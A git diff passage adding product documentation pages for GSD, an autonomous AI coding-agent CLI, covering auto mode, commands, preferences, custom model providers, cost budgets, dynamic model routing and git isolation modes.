from discussion + slices/ + S01/ + S01-PLAN.md — task decomposition + S01-SUMMARY.md — what happened + S01-UAT.md — human test script + tasks/ + T01-PLAN.md + T01-SUMMARY.md +``` + + +## Resume a session + +```bash +gsd --continue # or gsd -c +``` + +Resumes the most recent session. To pick from all saved sessions: + +```bash +gsd sessions +``` + +## VS Code extension + +GSD is also available as a VS Code extension (publisher: FluxLabs). It provides: + +- **`@gsd` chat participant** — talk to the agent in VS Code Chat +- **Sidebar dashboard** — connection status, model info, token usage, quick actions +- **Full command palette** — start/stop agent, switch models, export sessions + +The CLI (`gsd-pi`) must be installed first — the extension connects to it via RPC. + +## Web interface + +```bash +gsd --web +``` + +A browser-based dashboard with real-time progress and multi-project support. See [web interface](/guides/web-interface) for details. + +## Troubleshooting + +### `gsd` runs `git svn dcommit` instead of GSD + +The [oh-my-zsh git plugin](https://github.com/ohmyzsh/ohmyzsh/tree/master/plugins/git) defines `alias gsd='git svn dcommit'`. + +**Option 1** — Remove the alias in `~/.zshrc` (after the `source $ZSH/oh-my-zsh.sh` line): + +```bash +unalias gsd 2>/dev/null +``` + +**Option 2** — Use the alternative binary name: + +```bash +gsd-cli +``` + +Both `gsd` and `gsd-cli` point to the same binary. diff --git a/mintlify-docs/guides/auto-mode.mdx b/mintlify-docs/guides/auto-mode.mdx new file mode 100644 index 000000000..1c840a011 --- /dev/null +++ b/mintlify-docs/guides/auto-mode.mdx @@ -0,0 +1,181 @@ +--- +title: "Auto mode" +description: "GSD's autonomous execution engine — run /gsd auto, walk away, come back to built software with clean git history." +--- + +Auto mode is a **state machine driven by files on disk**. It reads `.gsd/STATE.md`, determines the next unit of work, creates a fresh agent session with pre-loaded context, and lets the LLM execute. When the LLM finishes, auto mode reads disk state again and dispatches the next unit. + +## The loop + +``` +Plan → Execute (per task) → Complete → Reassess Roadmap → Next Slice + ↓ (all slices done) + Validate → Complete Milestone +``` + +- **Plan** — scouts the codebase, researches docs, decomposes the slice into tasks +- **Execute** — runs each task in a fresh context window +- **Complete** — writes summary, UAT script, marks roadmap, commits +- **Reassess** — checks if the roadmap still makes sense +- **Validate** — reconciliation gate after all slices; catches gaps before sealing the milestone + +## Key properties + +### Fresh session per unit + +Every task, research phase, and planning step gets a clean context window. The dispatch prompt includes everything needed — task plans, prior summaries, dependency context, decisions register — so the LLM starts oriented. + +### Context pre-loading + +| Inlined artifact | Purpose | +|------------------|---------| +| Task plan | What to build | +| Slice plan | Where this task fits | +| Prior task summaries | What's already done | +| Dependency summaries | Cross-slice context | +| Roadmap excerpt | Overall direction | +| Decisions register | Architectural context | + +The amount of context inlined is controlled by your [token profile](/guides/token-optimization). Budget mode inlines minimal context; quality mode inlines everything. + +### Git isolation + +GSD isolates milestone work using one of three modes (configured via `git.isolation` in preferences): + +- **`none`** (default) — work happens on your current branch. No isolation overhead. +- **`worktree`** — each milestone runs in its own git worktree. Squash-merged to main on completion. +- **`branch`** — work happens on a `milestone/` branch in the project root. Useful for submodule-heavy repos. + +See [git strategy](/guides/git-strategy) for details. + +### Crash recovery + +A lock file tracks the current unit. If the session dies, the next `/gsd auto` synthesizes a recovery briefing from tool calls that made it to disk and resumes with full context. + +**Headless auto-restart:** When running `gsd headless auto`, crashes trigger automatic restart with exponential backoff (5s → 10s → 30s cap, default 3 attempts). Combined with crash recovery, this enables overnight "run until done" execution. + +### Provider error recovery + +| Error type | Examples | Action | +|-----------|----------|--------| +| Rate limit | 429, "too many requests" | Auto-resume after retry-after header or 60s | +| Server error | 500, 502, 503, "overloaded" | Auto-resume after 30s | +| Permanent | "unauthorized", "invalid key" | Pause indefinitely (requires manual resume) | + +### Stuck detection + +A sliding-window analysis detects stuck loops — catching cycles like A→B→A→B as well as single-unit repeats. On detection, GSD retries once with a diagnostic prompt. If it fails again, auto mode stops with the exact file it expected. + +### Timeout supervision + +| Timeout | Default | Behavior | +|---------|---------|----------| +| Soft | 20 min | Warns the LLM to wrap up | +| Idle | 10 min | Detects stalls, intervenes | +| Hard | 30 min | Pauses auto mode | + +Configure in preferences: + +```yaml +auto_supervisor: + soft_timeout_minutes: 20 + idle_timeout_minutes: 10 + hard_timeout_minutes: 30 +``` + +### Incremental memory + +GSD maintains a `KNOWLEDGE.md` file — an append-only register of project-specific rules, patterns, and lessons learned. The agent reads it at the start of every unit and appends when discovering recurring issues or non-obvious patterns. + +### Verification enforcement + +```yaml +verification_commands: + - npm run lint + - npm run test +verification_auto_fix: true +verification_max_retries: 2 +``` + +Failures trigger auto-fix retries — the agent sees the output and attempts to fix issues before advancing. + +### HTML reports + +After milestone completion, GSD auto-generates a self-contained HTML report with progress tree, dependency graph, cost/token metrics, execution timeline, and changelog. + +```yaml +auto_report: true # enabled by default +``` + +Generate manually with `/gsd export --html`, or for all milestones with `/gsd export --html --all`. + +### Reactive task execution + +When `reactive_execution: true` is set, GSD derives a dependency graph from IO annotations in task plans. Tasks that don't conflict are dispatched in parallel via subagents. + +```yaml +reactive_execution: true # disabled by default +``` + +## Controlling auto mode + + + + ``` + /gsd auto + ``` + + + Press **Escape**. The conversation is preserved. You can interact with the agent, inspect state, or resume. + + + ``` + /gsd auto + ``` + Auto mode reads disk state and picks up where it left off. + + + ``` + /gsd stop + ``` + Stops auto mode gracefully. Can be run from a different terminal. + + + +### Steer during execution + +``` +/gsd steer +``` + +Hard-steer plan documents without stopping the pipeline. Changes are picked up at the next phase boundary. + +### Capture thoughts + +``` +/gsd capture "add rate limiting to API endpoints" +``` + +Fire-and-forget thought capture. Triaged automatically between tasks. See [captures and triage](/guides/captures-triage). + +## Dashboard + +`Ctrl+Alt+G` or `/gsd status` shows real-time progress: + +- Current milestone, slice, and task +- Auto mode elapsed time and phase +- Per-unit cost and token breakdown +- Cost projections +- Pending capture count + +## Phase skipping + +Token profiles can skip phases to reduce cost: + +| Phase | `budget` | `balanced` | `quality` | +|-------|----------|------------|-----------| +| Milestone research | Skipped | Runs | Runs | +| Slice research | Skipped | Skipped | Runs | +| Reassess roadmap | Skipped | Runs | Runs | + +See [token optimization](/guides/token-optimization) for details. diff --git a/mintlify-docs/guides/captures-triage.mdx b/mintlify-docs/guides/captures-triage.mdx new file mode 100644 index 000000000..9ac838640 --- /dev/null +++ b/mintlify-docs/guides/captures-triage.mdx @@ -0,0 +1,75 @@ +--- +title: "Captures and triage" +description: "Fire-and-forget thought capture during auto-mode with automated triage." +--- + +Captures let you fire-and-forget thoughts during auto-mode execution. Instead of pausing to steer, capture ideas, bugs, or scope changes and let GSD triage them at natural seams between tasks. + +## Quick start + +While auto-mode is running (or any time): + +``` +/gsd capture "add rate limiting to the API endpoints" +/gsd capture "the auth flow should support OAuth, not just JWT" +``` + +Captures are appended to `.gsd/CAPTURES.md` and triaged automatically between tasks. + +## How it works + +``` +capture → triage → confirm → resolve → resume +``` + + + + `/gsd capture "thought"` appends to `.gsd/CAPTURES.md` with a timestamp and unique ID. + + + At natural seams between tasks, GSD classifies each capture. + + + You're shown the proposed resolution. Plan-modifying resolutions require confirmation. + + + The resolution is applied (task injection, replan trigger, deferral, etc.). + + + Auto-mode continues. + + + +## Classification types + +| Type | Meaning | Resolution | +|------|---------|------------| +| `quick-task` | Small, self-contained fix | Inline quick task executed immediately | +| `inject` | New task needed in current slice | Task injected into the active slice plan | +| `defer` | Important but not urgent | Deferred to roadmap reassessment | +| `replan` | Changes the current approach | Triggers slice replan with capture context | +| `note` | Informational, no action | Acknowledged, no plan changes | + +## Manual triage + +Trigger triage at any time: + +``` +/gsd triage +``` + +Useful when you've accumulated several captures and want to process them before the next natural seam. + +## Dashboard integration + +The progress widget shows a pending capture count badge when captures are waiting for triage. Visible in both the `Ctrl+Alt+G` dashboard and the auto-mode widget. + +## Context injection + +Capture context is automatically injected into: +- **Replan-slice prompts** — so the replan knows what triggered it +- **Reassess-roadmap prompts** — so deferred captures influence roadmap decisions + +## Worktree awareness + +Captures resolve to the **original project root's** `.gsd/CAPTURES.md`, not the worktree's local copy. Captures from a steering terminal are visible to the auto-mode session running in a worktree. diff --git a/mintlify-docs/guides/commands.mdx b/mintlify-docs/guides/commands.mdx new file mode 100644 index 000000000..8c9c9bba0 --- /dev/null +++ b/mintlify-docs/guides/commands.mdx @@ -0,0 +1,182 @@ +--- +title: "Commands reference" +description: "Every GSD command, keyboard shortcut, and CLI flag." +--- + +## Session commands + +| Command | Description | +|---------|-------------| +| `/gsd` | Step mode — execute one unit at a time, pause between each | +| `/gsd next` | Explicit step mode (same as `/gsd`) | +| `/gsd auto` | Autonomous mode — research, plan, execute, commit, repeat | +| `/gsd quick` | Execute a quick task with GSD guarantees without full planning overhead | +| `/gsd stop` | Stop auto mode gracefully | +| `/gsd pause` | Pause auto mode (preserves state, `/gsd auto` to resume) | +| `/gsd steer` | Hard-steer plan documents during execution | +| `/gsd discuss` | Discuss architecture and decisions (works alongside auto mode) | +| `/gsd rethink` | Conversational project reorganization | +| `/gsd mcp` | MCP server status and connectivity | +| `/gsd status` | Progress dashboard | +| `/gsd widget` | Cycle dashboard widget: full / small / min / off | +| `/gsd queue` | Queue and reorder future milestones (safe during auto mode) | +| `/gsd capture` | Fire-and-forget thought capture (works during auto mode) | +| `/gsd triage` | Manually trigger triage of pending captures | +| `/gsd dispatch` | Dispatch a specific phase directly | +| `/gsd history` | View execution history (supports `--cost`, `--phase`, `--model` filters) | +| `/gsd forensics` | Full-access debugger for auto-mode failures | +| `/gsd cleanup` | Clean up GSD state files and stale worktrees | +| `/gsd visualize` | Open workflow visualizer | +| `/gsd export --html` | Generate self-contained HTML report | +| `/gsd export --html --all` | Generate reports for all milestones | +| `/gsd update` | Update GSD to the latest version in-session | +| `/gsd knowledge` | Add persistent project knowledge | +| `/gsd fast` | Toggle service tier for supported models | +| `/gsd rate` | Rate last unit's model tier (over/ok/under) | +| `/gsd changelog` | Show categorized release notes | +| `/gsd logs` | Browse activity logs, debug logs, and metrics | +| `/gsd remote` | Control remote auto-mode | +| `/gsd help` | Categorized command reference | + +## Configuration and diagnostics + +| Command | Description | +|---------|-------------| +| `/gsd prefs` | Model selection, timeouts, budget ceiling | +| `/gsd mode` | Switch workflow mode (solo/team) | +| `/gsd config` | Re-run the provider setup wizard | +| `/gsd keys` | API key manager — list, add, remove, test, rotate | +| `/gsd doctor` | Runtime health checks with auto-fix | +| `/gsd inspect` | Show SQLite DB diagnostics | +| `/gsd init` | Project init wizard | +| `/gsd setup` | Global setup status and configuration | +| `/gsd skill-health` | Skill lifecycle dashboard | +| `/gsd hooks` | Show configured post-unit and pre-dispatch hooks | +| `/gsd run-hook` | Manually trigger a specific hook | +| `/gsd migrate` | Migrate a v1 `.planning` directory to `.gsd` format | + +## Milestone management + +| Command | Description | +|---------|-------------| +| `/gsd new-milestone` | Create a new milestone | +| `/gsd skip` | Prevent a unit from auto-mode dispatch | +| `/gsd undo` | Revert last completed unit | +| `/gsd undo-task` | Reset a specific task's completion state | +| `/gsd reset-slice` | Reset a slice and all its tasks | +| `/gsd park` | Park a milestone — skip without deleting | +| `/gsd unpark` | Reactivate a parked milestone | + +## Parallel orchestration + +| Command | Description | +|---------|-------------| +| `/gsd parallel start` | Analyze eligibility, confirm, and start workers | +| `/gsd parallel status` | Show all workers with state, progress, and cost | +| `/gsd parallel stop [MID]` | Stop all workers or a specific one | +| `/gsd parallel pause [MID]` | Pause all or a specific worker | +| `/gsd parallel resume [MID]` | Resume paused workers | +| `/gsd parallel merge [MID]` | Merge completed milestones to main | + +## Workflow templates + +| Command | Description | +|---------|-------------| +| `/gsd start` | Start a workflow template (bugfix, spike, feature, hotfix, refactor, etc.) | +| `/gsd start resume` | Resume an in-progress workflow | +| `/gsd templates` | List available workflow templates | +| `/gsd templates info ` | Show detailed template info | + +## Custom workflows + +| Command | Description | +|---------|-------------| +| `/gsd workflow new` | Create a new workflow definition | +| `/gsd workflow run ` | Create a run and start auto-mode | +| `/gsd workflow list` | List workflow runs | +| `/gsd workflow validate ` | Validate a workflow definition | +| `/gsd workflow pause` | Pause custom workflow auto-mode | +| `/gsd workflow resume` | Resume paused custom workflow auto-mode | + +## Extensions + +| Command | Description | +|---------|-------------| +| `/gsd extensions list` | List all extensions and their status | +| `/gsd extensions enable ` | Enable a disabled extension | +| `/gsd extensions disable ` | Disable an extension | +| `/gsd extensions info ` | Show extension details | + +## Keyboard shortcuts + +| Shortcut | Action | +|----------|--------| +| `Ctrl+Alt+G` | Toggle dashboard overlay | +| `Ctrl+Alt+V` | Toggle voice transcription | +| `Ctrl+Alt+B` | Show background shell processes | +| `Ctrl+V` / `Alt+V` | Paste image from clipboard | +| `Escape` | Pause auto mode | + + +In terminals without Kitty keyboard protocol support (macOS Terminal.app, JetBrains IDEs), slash-command fallbacks are shown instead of `Ctrl+Alt` shortcuts. + + +## CLI flags + +| Flag | Description | +|------|-------------| +| `gsd` | Start a new interactive session | +| `gsd --continue` (`-c`) | Resume the most recent session | +| `gsd --model ` | Override the default model | +| `gsd --print "msg"` (`-p`) | Single-shot prompt mode (no TUI) | +| `gsd --mode ` | Output mode for non-interactive use | +| `gsd --list-models [search]` | List available models and exit | +| `gsd --web [path]` | Start browser-based web interface | +| `gsd --worktree` (`-w`) `[name]` | Start session in a git worktree | +| `gsd --no-session` | Disable session persistence | +| `gsd --extension ` | Load an additional extension | +| `gsd --version` (`-v`) | Print version and exit | +| `gsd sessions` | Interactive session picker | +| `gsd config` | Set up global API keys | +| `gsd update` | Update GSD to the latest version | + +## Headless mode + +`gsd headless` runs commands without a TUI — designed for CI, cron jobs, and scripted automation. + +```bash +gsd headless # run auto mode +gsd headless next # run a single unit +gsd headless query # instant JSON snapshot (~50ms, no LLM) +gsd headless --timeout 600000 auto # with timeout +gsd headless new-milestone --context brief.md --auto +``` + +| Flag | Description | +|------|-------------| +| `--timeout N` | Overall timeout in milliseconds (default: 300000) | +| `--max-restarts N` | Auto-restart on crash (default: 3, set 0 to disable) | +| `--json` | Stream events as JSONL to stdout | +| `--model ID` | Override the model | +| `--context ` | Context file for `new-milestone` (use `-` for stdin) | +| `--auto` | Chain into auto-mode after milestone creation | + +**Exit codes:** `0` = complete, `1` = error/timeout, `2` = blocked. + +### `gsd headless query` + +Returns a JSON snapshot of the project state — no LLM session, instant response. + +```bash +gsd headless query | jq '.state.phase' # "executing" +gsd headless query | jq '.next' # next dispatch action +gsd headless query | jq '.cost.total' # total spend +``` + +## MCP server mode + +```bash +gsd --mode mcp +``` + +Runs GSD as a Model Context Protocol server over stdin/stdout, exposing all tools to external AI clients (Claude Desktop, VS Code Copilot, etc.). diff --git a/mintlify-docs/guides/configuration.mdx b/mintlify-docs/guides/configuration.mdx new file mode 100644 index 000000000..4961d66b9 --- /dev/null +++ b/mintlify-docs/guides/configuration.mdx @@ -0,0 +1,306 @@ +--- +title: "Configuration" +description: "Preferences, model selection, MCP servers, hooks, and all settings." +--- + +GSD preferences live in `~/.gsd/PREFERENCES.md` (global) or `.gsd/PREFERENCES.md` (project-local). Manage interactively with `/gsd prefs`. + +## Preferences commands + +| Command | Description | +|---------|-------------| +| `/gsd prefs` | Open the global preferences wizard | +| `/gsd prefs global` | Global preferences wizard | +| `/gsd prefs project` | Project preferences wizard | +| `/gsd prefs status` | Show current files, merged values, and skill status | + +## Preferences file format + +Preferences use YAML frontmatter in a markdown file: + +```yaml +--- +version: 1 +models: + research: claude-sonnet-4-6 + planning: claude-opus-4-6 + execution: claude-sonnet-4-6 + completion: claude-sonnet-4-6 +skill_discovery: suggest +auto_supervisor: + soft_timeout_minutes: 20 + idle_timeout_minutes: 10 + hard_timeout_minutes: 30 +budget_ceiling: 50.00 +token_profile: balanced +--- +``` + +## Global vs project preferences + +| Scope | Path | Applies to | +|-------|------|-----------| +| Global | `~/.gsd/PREFERENCES.md` | All projects | +| Project | `.gsd/PREFERENCES.md` | Current project only | + +**Merge behavior:** +- **Scalar fields** — project wins if defined +- **Array fields** — concatenated (global first, then project) +- **Object fields** — shallow-merged, project overrides per-key + +## Global API keys + +Tool API keys are stored globally in `~/.gsd/agent/auth.json`. Set them once with `/gsd config`. + +| Tool | Environment variable | Purpose | +|------|---------------------|---------| +| Tavily Search | `TAVILY_API_KEY` | Web search for non-Anthropic models | +| Brave Search | `BRAVE_API_KEY` | Web search for non-Anthropic models | +| Context7 Docs | `CONTEXT7_API_KEY` | Library documentation lookup | + +Anthropic models have built-in web search — no extra keys needed. + +## MCP servers + +GSD connects to external MCP servers configured in project files: + +- `.mcp.json` — repo-shared config +- `.gsd/mcp.json` — local-only config + + + + ```json + { + "mcpServers": { + "my-server": { + "type": "stdio", + "command": "/absolute/path/to/python3", + "args": ["/absolute/path/to/server.py"], + "env": { + "API_URL": "http://localhost:8000" + } + } + } + } + ``` + + + ```json + { + "mcpServers": { + "my-http-server": { + "url": "http://localhost:8080/mcp" + } + } + } + ``` + + + +Verify from a GSD session: `mcp_servers` → `mcp_discover` → `mcp_call`. + +## Models + +Per-phase model selection: + +```yaml +models: + research: claude-sonnet-4-6 + planning: + model: claude-opus-4-6 + fallbacks: + - openrouter/z-ai/glm-5 + execution: claude-sonnet-4-6 + execution_simple: claude-haiku-4-5-20250414 + completion: claude-sonnet-4-6 + subagent: claude-sonnet-4-6 +``` + +**Phases:** `research`, `planning`, `execution`, `execution_simple`, `completion`, `subagent` + +When a model fails to switch, GSD automatically tries the next model in the `fallbacks` list. + +For custom providers (Ollama, vLLM, LM Studio), see [custom models](/guides/custom-models). + +## All settings + +### `token_profile` + +Coordinates model selection, phase skipping, and context compression. Values: `budget`, `balanced` (default), `quality`. See [token optimization](/guides/token-optimization). + +### `budget_ceiling` + +Maximum USD spend during auto mode: + +```yaml +budget_ceiling: 50.00 +budget_enforcement: pause # warn, pause (default), or halt +``` + +### `auto_supervisor` + +Timeout thresholds: + +```yaml +auto_supervisor: + soft_timeout_minutes: 20 + idle_timeout_minutes: 10 + hard_timeout_minutes: 30 +``` + +### `skill_discovery` + +| Value | Behavior | +|-------|----------| +| `auto` | Skills found and applied automatically | +| `suggest` | Skills identified but not auto-installed (default) | +| `off` | Disabled | + +### Verification + +```yaml +verification_commands: + - npm run lint + - npm run test +verification_auto_fix: true +verification_max_retries: 2 +``` + +### Git + +See [git strategy](/guides/git-strategy) for full git configuration. + +### Notifications + +```yaml +notifications: + enabled: true + on_complete: true + on_error: true + on_budget: true + on_milestone: true + on_attention: true +``` + +### Post-unit hooks + +```yaml +post_unit_hooks: + - name: code-review + after: [execute-task] + prompt: "Review the code changes for quality and security." + model: claude-opus-4-6 + max_cycles: 1 + artifact: REVIEW.md +``` + +### Pre-dispatch hooks + +```yaml +pre_dispatch_hooks: + - name: add-standards + before: [execute-task] + action: modify # modify, skip, or replace + prepend: "Follow our coding standards." +``` + +### Skill routing + +```yaml +always_use_skills: + - debug-like-expert +prefer_skills: + - frontend-design +skill_rules: + - when: task involves authentication + use: [clerk] +``` + +### Custom instructions + +```yaml +custom_instructions: + - "Always use TypeScript strict mode" + - "Prefer functional patterns over classes" +``` + +### Dynamic routing + +See [dynamic model routing](/guides/dynamic-model-routing). + +### Parallel execution + +See [parallel orchestration](/guides/parallel-orchestration). + +## Environment variables + +| Variable | Default | Description | +|----------|---------|-------------| +| `GSD_HOME` | `~/.gsd` | Global GSD directory | +| `GSD_PROJECT_ID` | (auto-hash) | Override project identity hash | +| `GSD_STATE_DIR` | `$GSD_HOME` | Per-project state root | +| `GSD_CODING_AGENT_DIR` | `$GSD_HOME/agent` | Agent directory | + +## Full example + + +```yaml +--- +version: 1 + +models: + research: openrouter/deepseek/deepseek-r1 + planning: + model: claude-opus-4-6 + fallbacks: + - openrouter/z-ai/glm-5 + execution: claude-sonnet-4-6 + execution_simple: claude-haiku-4-5-20250414 + completion: claude-sonnet-4-6 + +token_profile: balanced + +dynamic_routing: + enabled: true + escalate_on_failure: true + budget_pressure: true + +budget_ceiling: 25.00 +budget_enforcement: pause +context_pause_threshold: 80 + +auto_supervisor: + soft_timeout_minutes: 15 + hard_timeout_minutes: 25 + +git: + auto_push: true + merge_strategy: squash + isolation: none + commit_docs: true + +skill_discovery: suggest +always_use_skills: + - debug-like-expert +skill_rules: + - when: task involves authentication + use: [clerk] + +notifications: + on_complete: false + on_milestone: true + on_attention: true + +auto_visualize: true +service_tier: priority +forensics_dedup: true +show_token_cost: true + +post_unit_hooks: + - name: code-review + after: [execute-task] + prompt: "Review {sliceId}/{taskId} for quality and security." + artifact: REVIEW.md +--- +``` + diff --git a/mintlify-docs/guides/cost-management.mdx b/mintlify-docs/guides/cost-management.mdx new file mode 100644 index 000000000..52e25e6c8 --- /dev/null +++ b/mintlify-docs/guides/cost-management.mdx @@ -0,0 +1,80 @@ +--- +title: "Cost management" +description: "Budget ceilings, cost tracking, projections, and enforcement modes." +--- + +GSD tracks token usage and cost for every unit of work dispatched during auto mode. This data powers the dashboard, budget enforcement, and cost projections. + +## Cost tracking + +Every unit's metrics are captured automatically: + +- **Token counts** — input, output, cache read, cache write, total +- **Cost** — USD cost per unit +- **Duration** — wall-clock time +- **Tool calls** — number of tool invocations +- **Message counts** — assistant and user messages + +Data is stored in `.gsd/metrics.json` and survives across sessions. + +### Viewing costs + +`Ctrl+Alt+G` or `/gsd status` shows real-time cost breakdown by: + +- Phase (research, planning, execution, completion, reassessment) +- Slice (M001/S01, M001/S02, ...) +- Model (which models consumed the most budget) +- Project totals + +## Budget ceiling + +```yaml +budget_ceiling: 50.00 +``` + +### Enforcement modes + +| Mode | Behavior | +|------|----------| +| `warn` | Log a warning, continue | +| `pause` | Pause auto mode (default when ceiling is set) | +| `halt` | Stop auto mode entirely | + +## Cost projections + +After two or more slices complete, GSD projects the remaining cost: + +``` +Projected remaining: $12.40 ($6.20/slice avg × 2 remaining) +``` + +## Budget pressure and model downgrading + +When approaching the budget ceiling, the [complexity router](/guides/token-optimization) automatically downgrades model assignments: + +| Budget used | Effect | +|------------|--------| +| < 50% | No adjustment | +| 50-75% | Standard tasks → Light | +| 75-90% | More aggressive | +| > 90% | Nearly everything downgrades | + +## Token profiles and cost + +| Profile | Typical savings | How | +|---------|----------------|-----| +| `budget` | 40-60% | Cheaper models, phase skipping, minimal context | +| `balanced` | 10-20% | Default models, skip slice research | +| `quality` | 0% (baseline) | Full models, all phases | + +See [token optimization](/guides/token-optimization) for details. + +## Tips + +- Start with `balanced` and a generous `budget_ceiling` to establish baseline costs +- Check `/gsd status` after a few slices to see per-slice averages +- Switch to `budget` for well-understood, repetitive work +- Use `quality` only for architectural decisions +- Per-phase model selection lets you use Opus for planning while keeping execution on Sonnet +- Enable [dynamic routing](/guides/dynamic-model-routing) for automatic downgrading on simple tasks +- Use `/gsd visualize` → Metrics tab to see where your budget is going diff --git a/mintlify-docs/guides/custom-models.mdx b/mintlify-docs/guides/custom-models.mdx new file mode 100644 index 000000000..02e61ae7d --- /dev/null +++ b/mintlify-docs/guides/custom-models.mdx @@ -0,0 +1,126 @@ +--- +title: "Custom models" +description: "Add custom providers and models (Ollama, vLLM, LM Studio, proxies) via models.json." +--- + +Define custom models and providers in `~/.gsd/agent/models.json`. This lets you add models not in the default registry — self-hosted endpoints, fine-tuned models, proxies, or new provider releases. + +The file reloads each time you open `/model` — no restart needed. + +## Minimal example + +For local models (Ollama, LM Studio, vLLM): + +```json +{ + "providers": { + "ollama": { + "baseUrl": "http://localhost:11434/v1", + "api": "openai-completions", + "apiKey": "ollama", + "models": [ + { "id": "llama3.1:8b" }, + { "id": "qwen2.5-coder:7b" } + ] + } + } +} +``` + +The `apiKey` is required but Ollama ignores it — any value works. + +## Supported APIs + +| API | Description | +|-----|-------------| +| `openai-completions` | OpenAI Chat Completions (most compatible) | +| `openai-responses` | OpenAI Responses API | +| `anthropic-messages` | Anthropic Messages API | +| `google-generative-ai` | Google Generative AI | + +## Provider configuration + +| Field | Description | +|-------|-------------| +| `baseUrl` | API endpoint URL | +| `api` | API type | +| `apiKey` | API key (supports shell commands, env vars, or literals) | +| `headers` | Custom headers | +| `authHeader` | Set `true` to add `Authorization: Bearer` automatically | +| `models` | Array of model configurations | +| `modelOverrides` | Per-model overrides for built-in models | + +### Value resolution + +The `apiKey` and `headers` fields support three formats: + +```json +"apiKey": "!security find-generic-password -ws 'anthropic'" // shell command +"apiKey": "MY_API_KEY" // env variable +"apiKey": "sk-..." // literal value +``` + +## Model configuration + +| Field | Required | Default | Description | +|-------|----------|---------|-------------| +| `id` | Yes | — | Model identifier (passed to the API) | +| `name` | No | `id` | Human-readable label | +| `api` | No | provider's `api` | Override per model | +| `reasoning` | No | `false` | Supports extended thinking | +| `input` | No | `["text"]` | `["text"]` or `["text", "image"]` | +| `contextWindow` | No | `128000` | Context window size | +| `maxTokens` | No | `16384` | Maximum output tokens | +| `cost` | No | all zeros | Per-million tokens: `input`, `output`, `cacheRead`, `cacheWrite` | + +## Overriding built-in providers + +Route a built-in provider through a proxy without redefining models: + +```json +{ + "providers": { + "anthropic": { + "baseUrl": "https://my-proxy.example.com/v1" + } + } +} +``` + +All built-in Anthropic models remain available. To add custom models alongside built-in ones, include the `models` array. + +## OpenAI compatibility + +For providers with partial OpenAI compatibility, use the `compat` field at provider or model level: + +```json +{ + "providers": { + "local-llm": { + "baseUrl": "http://localhost:8080/v1", + "api": "openai-completions", + "compat": { + "supportsDeveloperRole": false, + "supportsReasoningEffort": false + }, + "models": [...] + } + } +} +``` + +| Field | Description | +|-------|-------------| +| `supportsDeveloperRole` | Use `developer` vs `system` role | +| `supportsReasoningEffort` | Support for `reasoning_effort` parameter | +| `supportsUsageInStreaming` | Support for `stream_options: { include_usage: true }` | +| `maxTokensField` | `max_completion_tokens` or `max_tokens` | +| `thinkingFormat` | `reasoning_effort`, `zai`, `qwen`, or `qwen-chat-template` | +| `openRouterRouting` | OpenRouter provider selection config | +| `vercelGatewayRouting` | Vercel AI Gateway provider selection | + +## Community provider extensions + +| Extension | Provider | Models | Install | +|-----------|----------|--------|---------| +| [`pi-dashscope`](https://www.npmjs.com/package/pi-dashscope) | Alibaba DashScope | Qwen3, GLM-5, MiniMax M2.5, Kimi K2.5 | `gsd install npm:pi-dashscope` | diff --git a/mintlify-docs/guides/dynamic-model-routing.mdx b/mintlify-docs/guides/dynamic-model-routing.mdx new file mode 100644 index 000000000..d6cb80ed6 --- /dev/null +++ b/mintlify-docs/guides/dynamic-model-routing.mdx @@ -0,0 +1,94 @@ +--- +title: "Dynamic model routing" +description: "Automatically select cheaper models for simple work and reserve expensive models for complex tasks." +--- + +Dynamic model routing classifies each dispatched unit into a complexity tier and selects an appropriate model. This reduces token consumption by 20-50% without sacrificing quality where it matters. + +The key rule: **downgrade-only semantics**. Your configured model is always the ceiling — routing never upgrades beyond what you've configured. + +## Enabling + +```yaml +dynamic_routing: + enabled: true +``` + +## Complexity tiers + +| Tier | Typical work | Default model level | +|------|-------------|-------------------| +| **Light** | Slice completion, UAT, hooks | Haiku-class | +| **Standard** | Research, planning, execution | Sonnet-class | +| **Heavy** | Replanning, roadmap reassessment | Opus-class | + +## Configuration + +```yaml +dynamic_routing: + enabled: true + tier_models: + light: claude-haiku-4-5 + standard: claude-sonnet-4-6 + heavy: claude-opus-4-6 + escalate_on_failure: true # bump tier on task failure + budget_pressure: true # auto-downgrade near budget ceiling + cross_provider: true # consider models from other providers +``` + +### `escalate_on_failure` + +When a task fails at a given tier, the router escalates: Light → Standard → Heavy. Prevents cheap models from burning retries on work that needs more reasoning. + +### `budget_pressure` + +Progressive downgrading as budget ceiling approaches: + +| Budget used | Effect | +|------------|--------| +| < 50% | No adjustment | +| 50-75% | Standard → Light | +| 75-90% | More aggressive | +| > 90% | Nearly everything → Light | + +### `cross_provider` + +The router may select models from providers other than your primary, using a built-in cost table to find the cheapest model at each tier. + +## Task plan analysis + +For `execute-task` units, the classifier analyzes the task plan: + +| Signal | Simple → Light | Complex → Heavy | +|--------|---------------|----------------| +| Step count | ≤ 3 | ≥ 8 | +| File count | ≤ 3 | ≥ 8 | +| Description length | < 500 chars | > 2000 chars | +| Code blocks | — | ≥ 5 | +| Complexity keywords | None | Present | + +## Adaptive learning + +The routing history (`.gsd/routing-history.json`) tracks success/failure per tier per unit type. If a tier's failure rate exceeds 20%, future classifications are bumped up. + +User feedback (`/gsd rate`) is weighted 2x vs automatic outcomes. + +## Cost table + +| Model | Input (per M) | Output (per M) | +|-------|-------|--------| +| claude-haiku-4-5 | $0.80 | $4.00 | +| claude-sonnet-4-6 | $3.00 | $15.00 | +| claude-opus-4-6 | $15.00 | $75.00 | +| gpt-4o-mini | $0.15 | $0.60 | +| gpt-4o | $2.50 | $10.00 | +| gemini-2.0-flash | $0.10 | $0.40 | + +The cost table is for comparison only — actual billing comes from your provider. + +## Interaction with token profiles + +- **Token profiles** control phase skipping and context compression +- **Dynamic routing** controls per-unit model selection within those constraints + +The `budget` profile + dynamic routing provides maximum cost savings. diff --git a/mintlify-docs/guides/git-strategy.mdx b/mintlify-docs/guides/git-strategy.mdx new file mode 100644 index 000000000..67ce24742 --- /dev/null +++ b/mintlify-docs/guides/git-strategy.mdx @@ -0,0 +1,157 @@ +--- +title: "Git strategy" +description: "Isolation modes, branching model, and merge behavior for milestone work." +--- + +GSD uses git for milestone isolation and sequential commits. You choose an **isolation mode** that controls where work happens. The strategy is fully automated — no manual branch management needed. + +## Isolation modes + +Configure via the `git.isolation` preference: + +| Mode | Working directory | Branch | Best for | +|------|-------------------|--------|----------| +| `none` (default) | Project root | Current branch | Most projects — no isolation overhead | +| `worktree` | `.gsd/worktrees//` | `milestone/` | Full file isolation | +| `branch` | Project root | `milestone/` | Submodule-heavy repos | + +### `none` mode (default) + +Work happens directly on your current branch. No worktree, no milestone branch. GSD still commits sequentially with conventional commit messages, but there's no branch isolation. This is the simplest mode and works well for most projects. + +### 